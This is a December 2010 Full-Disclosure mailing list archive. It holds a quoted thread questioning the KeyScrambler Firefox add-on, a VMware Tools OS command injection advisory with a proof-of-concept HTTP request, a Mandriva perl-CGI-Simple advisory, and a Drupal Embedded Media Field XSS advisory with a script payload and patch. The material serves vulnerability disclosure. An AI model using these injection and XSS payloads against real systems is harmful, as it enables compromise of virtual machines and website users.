Re: [Full-disclosure] Firefox Addon: KeyScrambler
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 08/12/2010 11:30, Tim Gurney wrote: Hi This seems to contradict itself somewhat. A plugin to firefox should have no way to encrypt things at a driver level within the kernel, that would require installing seperate software at the root level, a plugin should not be able to do this and i would be VERY worried and surprised if it could as it would mean bypassing the security of the OS. I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. I am not a professional, I do this kind of research as a hobby and for educational purposes, when I have some free time. Also if the driver is encrypting the key strokes and the plugin is decrypting, what about all the keystrokes that are not in firefox, like email, word processing, programming, there is nothing to decrypt these so you would end up only ever being able to use firefox on the machine and nothing else every again. The devs do state that it only encrypts keystrokes in Firefox and not other applications, although they do sell a version that supposedly works in over 160 browsers and applications. personally I would not touch this with a barge pole and I would do a lot more more digging and checking into this. Yes, I am sceptical of claims, hence the post to this list. regards Tim Thanks for your input Dave. On 08/12/10 11:12, mrx wrote: Hi list, Is anyone familiar with the firefox addon KeyScrambler? According to developers this encrypts keystrokes. Quote: How KeyScrambler Works: When you type on your keyboard, the keys travel along a path within the operating system before it arrives at your browser. Keyloggers plant themselves along this path and observe and record your keystrokes. The collected information is then sent to the criminals who will use it to steal from you. KeyScrambler defeats keyloggers by encrypting your keystrokes at the keyboard driver level, deep within the operating system. When the encrypted keystrokes reach your browser, KeyScrambler then decrypts them so you see exactly the keys you've typed. Keyloggers can only record the encrypted keys, which are completely indecipherable. Can this be trusted? As in trusted I mean not bypassed. Input from the professionals on this list would be much appreciated. Thank you regards Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- Mankind's systems are white sticks tapping walls. Thanks Roy http://www.propergander.org.uk -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTQCuDrIvn8UFHWSmAQIgqAf9GJ6zNdmPxhCCsxJ10gmsBl5KixH6Wmi4 oSJs309oRg5sBgBWmuXxTDE7cOlnzeW9BYMf/j2IepKPIKhrO4PO0u001yMlLd0K Jn0dG9wvEyyUiua5zeiHVB8ff1w2Op/AlDA3i3JK5GZrcnBZulh0dn9zpfIcRtW9 RhYNA0DTYLX72840s7uTCItKtLHRqKfuSakPmaX+J+9xci6/SM38YdMCul+d54CU EayoJYjURXYG4GtFUUQA6uOqmn4pbQfSkP2/hAB04kNCghzY0TkDhP2VWQ24/dgj CKqxM3vTcXrjcdM3k13WpRaIMgjZnBiklGJ0ZhE0gxRYACTfPJLolw== =a6QP -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox Addon: KeyScrambler
I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. Alternatively, you can just decompress the XPI (it's in fact a zip) and inspect the js files and/or decompress any binaries. I suppose they are distributing some form of driver, so you'd find IDA/ollydbg useful. Chris. On Thu, Dec 9, 2010 at 11:23 AM, mrx m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 08/12/2010 11:30, Tim Gurney wrote: Hi This seems to contradict itself somewhat. A plugin to firefox should have no way to encrypt things at a driver level within the kernel, that would require installing seperate software at the root level, a plugin should not be able to do this and i would be VERY worried and surprised if it could as it would mean bypassing the security of the OS. I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. I am not a professional, I do this kind of research as a hobby and for educational purposes, when I have some free time. Also if the driver is encrypting the key strokes and the plugin is decrypting, what about all the keystrokes that are not in firefox, like email, word processing, programming, there is nothing to decrypt these so you would end up only ever being able to use firefox on the machine and nothing else every again. The devs do state that it only encrypts keystrokes in Firefox and not other applications, although they do sell a version that supposedly works in over 160 browsers and applications. personally I would not touch this with a barge pole and I would do a lot more more digging and checking into this. Yes, I am sceptical of claims, hence the post to this list. regards Tim Thanks for your input Dave. On 08/12/10 11:12, mrx wrote: Hi list, Is anyone familiar with the firefox addon KeyScrambler? According to developers this encrypts keystrokes. Quote: How KeyScrambler Works: When you type on your keyboard, the keys travel along a path within the operating system before it arrives at your browser. Keyloggers plant themselves along this path and observe and record your keystrokes. The collected information is then sent to the criminals who will use it to steal from you. KeyScrambler defeats keyloggers by encrypting your keystrokes at the keyboard driver level, deep within the operating system. When the encrypted keystrokes reach your browser, KeyScrambler then decrypts them so you see exactly the keys you've typed. Keyloggers can only record the encrypted keys, which are completely indecipherable. Can this be trusted? As in trusted I mean not bypassed. Input from the professionals on this list would be much appreciated. Thank you regards Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- Mankind's systems are white sticks tapping walls. Thanks Roy http://www.propergander.org.uk -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTQCuDrIvn8UFHWSmAQIgqAf9GJ6zNdmPxhCCsxJ10gmsBl5KixH6Wmi4 oSJs309oRg5sBgBWmuXxTDE7cOlnzeW9BYMf/j2IepKPIKhrO4PO0u001yMlLd0K Jn0dG9wvEyyUiua5zeiHVB8ff1w2Op/AlDA3i3JK5GZrcnBZulh0dn9zpfIcRtW9 RhYNA0DTYLX72840s7uTCItKtLHRqKfuSakPmaX+J+9xci6/SM38YdMCul+d54CU EayoJYjURXYG4GtFUUQA6uOqmn4pbQfSkP2/hAB04kNCghzY0TkDhP2VWQ24/dgj CKqxM3vTcXrjcdM3k13WpRaIMgjZnBiklGJ0ZhE0gxRYACTfPJLolw== =a6QP -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox Addon: KeyScrambler
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 08/12/2010 13:40, Julien Reveret wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi list, Is anyone familiar with the firefox addon KeyScrambler? According to developers this encrypts keystrokes. What if the attacker uses a firefox plugin such as ffsnif[1] to get user's credential ? As Dan said, I guess this plugin will only fool some keyloggers, but not all. [1] http://azurit.elbiahosting.sk/ffsniff/ Thanks for the link. Looking through the code of ffsniff was an eye opener. I would hope that such an addon would be instantly recognised as malicious by Mozilla. I am a curious hobbyist and pretty much a noob when compared to real professionals. Perhaps in five years or so I might actually be able to contribute to the community :-) Thanks for your response regards Dave -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTQCvzbIvn8UFHWSmAQIibwgA4XwD9OmqEmogqG4oqrMPsGMML5Wnw7HC H3kYfXbRVJWMoWHHAcKwP6qSmddCGBLl+In3sifoybyEJvh0ceu92o9GpDJVytbi adOP5jnlJWu595Ff2tPY6tRuLOb4YVH7GkhPL5N3Lj340JR4rlTzYKuisqC6OPyk 1qzf05XtZZRDqdr9XrYzFdEcfbFQJ+/zGGhfWiSU38d2bYRjo56ujcfo4asb5ojb QpgCUo9wP5OlSHz+A+pCcDKcFjPCeNV2i2Qqgx1DVFHlrEafdAQ2sFKoewxPW4oX Tm1zrYeRsW1rmVrWgbEjJZOQRCLMsVqunhjQ4Jp2klU4eRX+fGCOzw== =C9qt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox Addon: KeyScrambler
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 09/12/2010 10:26, Christian Sciberras wrote: I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. Alternatively, you can just decompress the XPI (it's in fact a zip) and inspect the js files and/or decompress any binaries. I suppose they are distributing some form of driver, so you'd find IDA/ollydbg useful. Chris. I extracted the files (various .js files and an exe) from the xpi. The .js files version check and create an instance of keyscrambler.sys with the current firefox window passed to it as an argument. I also extracted the contents of the executable; setup.exe. Setup.exe contained various dll's and one sys file. I presumed this sys file; keyscrambler.sys, is the driver and main component of this addon. To confirm I monitored the running of setup.exe. My preumption was correct keyscrambler.sys is installed in system32 folder and is registered as an autostarting service, although it is hidden from the services pane in computer management. This is where my skills bottom out. ASM is something I have not yet got my head around. I have a clue, but that's about all I do have... in time ;-) Thanks for your advice and input regards Dave On Thu, Dec 9, 2010 at 11:23 AM, mrx m...@propergander.org.uk wrote: On 08/12/2010 11:30, Tim Gurney wrote: Hi This seems to contradict itself somewhat. A plugin to firefox should have no way to encrypt things at a driver level within the kernel, that would require installing seperate software at the root level, a plugin should not be able to do this and i would be VERY worried and surprised if it could as it would mean bypassing the security of the OS. I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. I am not a professional, I do this kind of research as a hobby and for educational purposes, when I have some free time. Also if the driver is encrypting the key strokes and the plugin is decrypting, what about all the keystrokes that are not in firefox, like email, word processing, programming, there is nothing to decrypt these so you would end up only ever being able to use firefox on the machine and nothing else every again. The devs do state that it only encrypts keystrokes in Firefox and not other applications, although they do sell a version that supposedly works in over 160 browsers and applications. personally I would not touch this with a barge pole and I would do a lot more more digging and checking into this. Yes, I am sceptical of claims, hence the post to this list. regards Tim Thanks for your input Dave. On 08/12/10 11:12, mrx wrote: Hi list, Is anyone familiar with the firefox addon KeyScrambler? According to developers this encrypts keystrokes. Quote: How KeyScrambler Works: When you type on your keyboard, the keys travel along a path within the operating system before it arrives at your browser. Keyloggers plant themselves along this path and observe and record your keystrokes. The collected information is then sent to the criminals who will use it to steal from you. KeyScrambler defeats keyloggers by encrypting your keystrokes at the keyboard driver level, deep within the operating system. When the encrypted keystrokes reach your browser, KeyScrambler then decrypts them so you see exactly the keys you've typed. Keyloggers can only record the encrypted keys, which are completely indecipherable. Can this be trusted? As in trusted I mean not bypassed. Input from the professionals on this list would be much appreciated. Thank you regards Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- Mankind's systems are white sticks tapping walls. Thanks Roy http://www.propergander.org.uk -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTQDGZrIvn8UFHWSmAQKuQgf/anyexT49oGKy7rvr0orBtSnPSAyhIoh9 tF0kwb6odcmF7WXW1NHi54ztuTwg7Ue0iJ4FNYSYedAhstJQuQRC6A6En76+xRe9
Re: [Full-disclosure] Firefox Addon: KeyScrambler
Dave, That's ok. Glad to have helped out :) Cheers, Chris. On Thu, Dec 9, 2010 at 1:07 PM, mrx m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 09/12/2010 10:26, Christian Sciberras wrote: I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. Alternatively, you can just decompress the XPI (it's in fact a zip) and inspect the js files and/or decompress any binaries. I suppose they are distributing some form of driver, so you'd find IDA/ollydbg useful. Chris. I extracted the files (various .js files and an exe) from the xpi. The .js files version check and create an instance of keyscrambler.sys with the current firefox window passed to it as an argument. I also extracted the contents of the executable; setup.exe. Setup.exe contained various dll's and one sys file. I presumed this sys file; keyscrambler.sys, is the driver and main component of this addon. To confirm I monitored the running of setup.exe. My preumption was correct keyscrambler.sys is installed in system32 folder and is registered as an autostarting service, although it is hidden from the services pane in computer management. This is where my skills bottom out. ASM is something I have not yet got my head around. I have a clue, but that's about all I do have... in time ;-) Thanks for your advice and input regards Dave On Thu, Dec 9, 2010 at 11:23 AM, mrx m...@propergander.org.uk wrote: On 08/12/2010 11:30, Tim Gurney wrote: Hi This seems to contradict itself somewhat. A plugin to firefox should have no way to encrypt things at a driver level within the kernel, that would require installing seperate software at the root level, a plugin should not be able to do this and i would be VERY worried and surprised if it could as it would mean bypassing the security of the OS. I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. I am not a professional, I do this kind of research as a hobby and for educational purposes, when I have some free time. Also if the driver is encrypting the key strokes and the plugin is decrypting, what about all the keystrokes that are not in firefox, like email, word processing, programming, there is nothing to decrypt these so you would end up only ever being able to use firefox on the machine and nothing else every again. The devs do state that it only encrypts keystrokes in Firefox and not other applications, although they do sell a version that supposedly works in over 160 browsers and applications. personally I would not touch this with a barge pole and I would do a lot more more digging and checking into this. Yes, I am sceptical of claims, hence the post to this list. regards Tim Thanks for your input Dave. On 08/12/10 11:12, mrx wrote: Hi list, Is anyone familiar with the firefox addon KeyScrambler? According to developers this encrypts keystrokes. Quote: How KeyScrambler Works: When you type on your keyboard, the keys travel along a path within the operating system before it arrives at your browser. Keyloggers plant themselves along this path and observe and record your keystrokes. The collected information is then sent to the criminals who will use it to steal from you. KeyScrambler defeats keyloggers by encrypting your keystrokes at the keyboard driver level, deep within the operating system. When the encrypted keystrokes reach your browser, KeyScrambler then decrypts them so you see exactly the keys you've typed. Keyloggers can only record the encrypted keys, which are completely indecipherable. Can this be trusted? As in trusted I mean not bypassed. Input from the professionals on this list would be much appreciated. Thank you regards Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- Mankind's systems are white sticks tapping walls. Thanks Roy http://www.propergander.org.uk -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2
Re: [Full-disclosure] Firefox Addon: KeyScrambler
Call me paranoid, but that sure would be a good way to spread a key logger! Gary B On 12/09/2010 07:25 AM, Christian Sciberras wrote: Dave, That's ok. Glad to have helped out :) Cheers, Chris. On Thu, Dec 9, 2010 at 1:07 PM, mrx m...@propergander.org.uk mailto:m...@propergander.org.uk wrote: On 09/12/2010 10:26, Christian Sciberras wrote: I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. Alternatively, you can just decompress the XPI (it's in fact a zip) and inspect the js files and/or decompress any binaries. I suppose they are distributing some form of driver, so you'd find IDA/ollydbg useful. Chris. I extracted the files (various .js files and an exe) from the xpi. The .js files version check and create an instance of keyscrambler.sys with the current firefox window passed to it as an argument. I also extracted the contents of the executable; setup.exe. Setup.exe contained various dll's and one sys file. I presumed this sys file; keyscrambler.sys, is the driver and main component of this addon. To confirm I monitored the running of setup.exe. My preumption was correct keyscrambler.sys is installed in system32 folder and is registered as an autostarting service, although it is hidden from the services pane in computer management. This is where my skills bottom out. ASM is something I have not yet got my head around. I have a clue, but that's about all I do have... in time ;-) Thanks for your advice and input regards Dave On Thu, Dec 9, 2010 at 11:23 AM, mrx m...@propergander.org.uk mailto:m...@propergander.org.uk wrote: On 08/12/2010 11:30, Tim Gurney wrote: Hi This seems to contradict itself somewhat. A plugin to firefox should have no way to encrypt things at a driver level within the kernel, that would require installing seperate software at the root level, a plugin should not be able to do this and i would be VERY worried and surprised if it could as it would mean bypassing the security of the OS. I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. I am not a professional, I do this kind of research as a hobby and for educational purposes, when I have some free time. Also if the driver is encrypting the key strokes and the plugin is decrypting, what about all the keystrokes that are not in firefox, like email, word processing, programming, there is nothing to decrypt these so you would end up only ever being able to use firefox on the machine and nothing else every again. The devs do state that it only encrypts keystrokes in Firefox and not other applications, although they do sell a version that supposedly works in over 160 browsers and applications. personally I would not touch this with a barge pole and I would do a lot more more digging and checking into this. Yes, I am sceptical of claims, hence the post to this list. regards Tim Thanks for your input Dave. On 08/12/10 11:12, mrx wrote: Hi list, Is anyone familiar with the firefox addon KeyScrambler? According to developers this encrypts keystrokes. Quote: How KeyScrambler Works: When you type on your keyboard, the keys travel along a path within the operating system before it arrives at your browser. Keyloggers plant themselves along this path and observe and record your keystrokes. The collected information is then sent to the criminals who will use it to steal from you. KeyScrambler defeats keyloggers by encrypting your keystrokes at the keyboard driver level, deep within the operating system. When the encrypted keystrokes reach your browser, KeyScrambler then decrypts them so you see exactly the keys you've typed. Keyloggers can only record the encrypted keys, which are completely indecipherable. Can this be trusted? As in trusted I mean not bypassed. Input from the professionals on this list would be much appreciated. Thank you regards Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Bonsai Information Security - VMware Tools update OS Command Injection
VMware Tools update OS Command Injection
1. Advisory Information
Advisory ID: BONSAI-2010-0110
Date published: Thu Dec 9, 2010
Vendors contacted: VMware
Release mode: Coordinated release
2. Vulnerability Information
Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2010-4297
3. Software Description
VMware Tools is a suite of utilities that enhances the performance of
the virtual machine's guest operating system and improves management of
the virtual machine. Without VMware Tools installed in your guest
operating system, guest performance lacks important functionality.
Installing VMware Tools eliminates or improves the following issues:
* low video resolution
* inadequate color depth
* incorrect display of network speed
* restricted movement of the mouse
* inability to copy and paste and drag-and-drop files
* missing sound
VMware Tools includes these components:
* VMware Tools service
* VMware device drivers
* VMware user process
* VMware Tools control panel
VMware Tools is provided in the following formats:
* ISOs (contain .tar and .rpm files) – packaged with the product and
are installed in a number of ways, depending upon the VMware product and
the guest operating system installed in the virtual machine. VMware
Tools provides a different ISO file for each type of supported guest
operating system: Windows, Linux, NetWare, Solaris, and FreeBSD.
* Operating System Specific Packages (OSPs) – downloaded and
installed from the command line. VMware Tools is available as separate
downloadable, light-weight packages that are specific to each supported
Linux operating system and VMware product. OSPs are an alternative to
the existing mechanism for installing VMware Tools and only support
Linux systems running on ESX.
4. Vulnerability Description
Injection flaws, such as SQL, OS, and LDAP injection, occur when
untrusted data is sent to an interpreter as part of a command or query.
The attacker’s hostile data can trick the interpreter into executing
unintended commands or accessing unauthorized data.
5. Vulnerable packages
Column 4 of the following table lists the action required to remediate
the vulnerability in each release, if a solution is available:
VMWare Product Product Version Running On Replace with / Apply Patch
VirtualCenter any Windows not affected
Workstation 7.X any 7.1.2 Build 301548 or later
Workstation 6.5.X any 6.5.5 Build 328052 or later
Player 3.1.X any 3.1.2 Build 301548 or later
Player 2.5.X any 2.5.5 Build 328052 or later
AMS any any not affected
Server 2.0.2 any affected, no patch planned
Fusion 3.1.X Mac OSX 3.1.2 Build 332101
Fusion 2.X Mac OSX 2.0.8 Build 328035
ESXi4.1 ESXiESXi410-201010402-BG
ESXi4.0 ESXiESXi400-201009402-BG
ESXi3.5 ESXiESXe350-201008402-T-BG **
ESX 4.1 ESX ESX410-201010405-BG
ESX 4.0 ESX ESX400-201009401-SG
ESX 3.5 ESX ESX350-201008409-BG **
ESX 3.0.3 ESX not affected
* hosted products are VMware Workstation, Player, ACE, Fusion.
** Non Windows-based guest systems on ESXi 3.5 and ESX 3.5 only:
- Install the relevant ESX patch.
- Manually upgrade tools in the virtual machine (virtual machine
users will not be prompted to upgrade tools). Note the VI Client may
not show that the VMware tools is out of date in th summary tab.
Full VMWare advisory could be found at:
http://www.vmware.com/security/advisories/VMSA-2010-0018.html
6. Non-vulnerable packages
See above table.
7. Credits
This vulnerability was discovered by Nahuel Grisolia ( nahuel -at-
bonsai-sec.com ).
8. Technical Description
8.1. OS Command Injection – PoC Example
CVSSv2 Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
VMware Server Infrastructure Web Access is prone to remote command
execution vulnerability because the software fails to adequately
sanitize user-supplied input.
When Updating the VMTools on a certain Guest Virtual Machine, a command
injection attack can be executed if specially crafted parameters are sent.
Successful attacks can compromise the affected Guest Virtual Machine
with root privileges.
The following proof of concept is given. It was exploited in a GNU/Linux
Guest with VMware Tools installed but not fully updated:
POST /ui/sb HTTP/1.1
[…]
Cookie: JSESSIONID=F78CCA7DD3CF4E2E82587B236660C9ED; user_name=vmuser;
l=http%3A%2F%2Flocalhost%3A80%2Fsdk
[…]
[{i:378,exec:/cmd/vm,args:[UpgradeTools_Task,{_i:VirtualMachine|960},;
INJECTED COMMAND HERE ;]}]
9. Report Timeline
• 2010-04-24 / Vulnerabilities were identified
• 2010-04-29 – 2010-12-02 / Multiple Contacts with Vendor
• 2010-12-09 / Vulnerability is Disclosed – PoC attached
10. About Bonsai
Bonsai is a company involved in providing professional computer
information security services. Currently a sound growth company, since
its foundation in
[Full-disclosure] [ MDVSA-2010:250 ] perl-CGI-Simple
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:250 http://www.mandriva.com/security/ ___ Package : perl-CGI-Simple Date: December 9, 2010 Affected: Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability was discovered and corrected in perl-CGI-Simple: The multipart_init function in (1) CGI.pm before 3.50 and (2) Simple.pm in CGI::Simple 1.112 and earlier uses a hardcoded value of the MIME boundary string in multipart/x-mixed-replace content, which allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via crafted input that contains this value, a different vulnerability than CVE-2010-3172 (CVE-2010-2761). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2761 ___ Updated Packages: Corporate 4.0: b2e5ffba685cf732133e42fe1b82791d corporate/4.0/i586/perl-CGI-Simple-0.077-1.1.20060mlcs4.noarch.rpm e37ee0869e2fd9f4e875354edca20c6f corporate/4.0/SRPMS/perl-CGI-Simple-0.077-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 5231722e821a5478827e17293dd0836b corporate/4.0/x86_64/perl-CGI-Simple-0.077-1.1.20060mlcs4.noarch.rpm e37ee0869e2fd9f4e875354edca20c6f corporate/4.0/SRPMS/perl-CGI-Simple-0.077-1.1.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 04f4b7381ba21a1ba14845a06b680fb1 mes5/i586/perl-CGI-Simple-1.1-4.1mdvmes5.1.noarch.rpm 15d6dc30e4dbf78a7371c1715386f552 mes5/SRPMS/perl-CGI-Simple-1.1-4.1mdvmes5.1.src.rpm Mandriva Enterprise Server 5/X86_64: bf81ab1b1798bb141b74c6f8e6d59630 mes5/x86_64/perl-CGI-Simple-1.1-4.1mdvmes5.1.noarch.rpm 15d6dc30e4dbf78a7371c1715386f552 mes5/SRPMS/perl-CGI-Simple-1.1-4.1mdvmes5.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFNAMpimqjQ0CJFipgRAsKPAJ9gy8D5blvchEFe/KRmwMEFYtjWZQCgzSmG 3t2bZiJcPZFuhFYF28NTyJ0= =Xkba -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Drupal Embedded Media Field XSS (Emaudio Contrib)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Details of this disclosure are also available at
http://www.madirish.net/?article=472
Description of Vulnerability:
- -
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL. The Drupal Embedded Media Field module
(http://drupal.org/project/emfield) will create fields for content
types that can be used to display video, image, and audio files from
various third party providers Unfortunately the Embedded Media Field
module contains an arbitrary HTML injection vulnerability (also known as
cross site scripting, or XSS) due to the fact that it fails to sanitize
user supplied audio file paths and custom embed code.
Systems affected:
- -
Drupal 6.19 with Embedded Media Field 6.x-1.25 and CCK 6.x-2.8 was
tested and shown to be vulnerable
Impact
- --
Users could inject arbitrary scripts into pages affecting other site
users. This could result in administrative account compromise leading
to web server process compromise. A more likely scenario would be for
an attacker to inject hidden content (such as iframes, applets, or
embedded objects) that would attack client browsers in an attempt to
compromise site users' machines. This vulnerability could also be used
to launch cross site request forgery (XSRF) attacks against the site
that could have other unexpected consequences.
Mitigating factors:
- ---
In order to exploit this vulnerability the attacker must have the
ability to edit content of a content type with an embedded media field.
Proof of concept:
- -
1. Install Drupal 6-19, CCK module, and Embedded Media Field module
version 6.x-1.25
2. Enable the Content, Embedded Media Field, Embedded Audio Field
modules from ?q=/admin/build/modules
3. Alter the default 'Story' content type at
?q=admin/content/node-type/story/fields
4. Add a 'New Field' in the form at the bottom of this page with the
label 'audio' the field name 'field_audio' the type 'Embedded Audio' and
the form element '3rd Party Aduio' then click the 'Save' button
5. Configure the new video field from
?q=admin/content/node-type/story/fields/field_video
6. Select all content providers for convenience and click 'Save field
settings' button at the bottom of the form
7. Create a new piece of story content from ?q=node/add/story entering
arbitrary values.
8. Enter '/scriptalert('xss');/scriptembed
onshow='alert(foo);'
src='http://traffic.libsyn.com/pauldotcom/PaulDotCom-SW-217pt2.mp3; in
the 'audio:' text field
9. Click the 'Save' and observe the rendered JavaScript alert whenever
the node is displayed
Patch:
- --
Applying the following patch mitigates this issue in version 6.x-1.25
- --- emfield/contrib/emaudio/providers/custom_url.inc 2009-06-26
14:31:00.0 -0400
+++ emfield/contrib/emaudio/providers/custom_url.inc2010-11-05
15:17:08.0 -0400
@@ -110,6 +110,7 @@ function emaudio_custom_url_rss($item, $
}
function theme_emaudio_custom_url_flash($url = NULL, $width = 0,
$height = 0, $field = NULL, $data = array(), $node = NULL, $autoplay =
FALSE) {
+ $url=str_replace(', '', $url); //this should be a URL validator
instead
// Display the audio using Flowplayer if it's available.
if (module_exists('flowplayer')) {
$config = array(
Vendor Response
- ---
http://drupal.org/node/992924
- --
Justin Klein Keane
http://www.MadIrish.net
The digital signature on this message can be confirmed using
the public key at http://www.madirish.net/gpgkey
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/
iPwEAQECAAYFAk0BFaEACgkQkSlsbLsN1gAcRAb/UI8b0S22tSsvwfimbi9mQSpr
wkKheh8Z/b+GGrYSYMh94acQlHJsnIMwRxVK1VJrlYm/IJd4lYJ/B5ZAlRwPryqx
K7POTeJSJ0zlOLaMkO6Gdblu0p8KmJEIglR8nU+R0+//wfBV4wmG5DuuV3k0v48l
1FC3rdmsBwup17wI7gXR5qc+Ck82p2oB90tiJHKwsfS55DTN3dfMFzL41E04GlsA
rtf950j8Tutp4MsvRK+f5yIOiyyo/DzJWBa1CdZ5FjryBmuiMg1ianpCO9RD6DwH
dqFte4LY8hztccAPXeI=
=bVtj
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Drupal Embedded Media Field Module XSS Vuln
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Details of this disclosure can also be found at
http://www.madirish.net/?article=474
Description of Vulnerability:
- -
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL. The Drupal Embedded Media Field module
(http://drupal.org/project/emfield) will create fields for content
types that can be used to display video, image, and audio files from
various third party providers Unfortunately the Embedded Media Field
module contains an arbitrary HTML injection vulnerability (also known as
cross site scripting, or XSS) due to the fact that it fails to sanitize
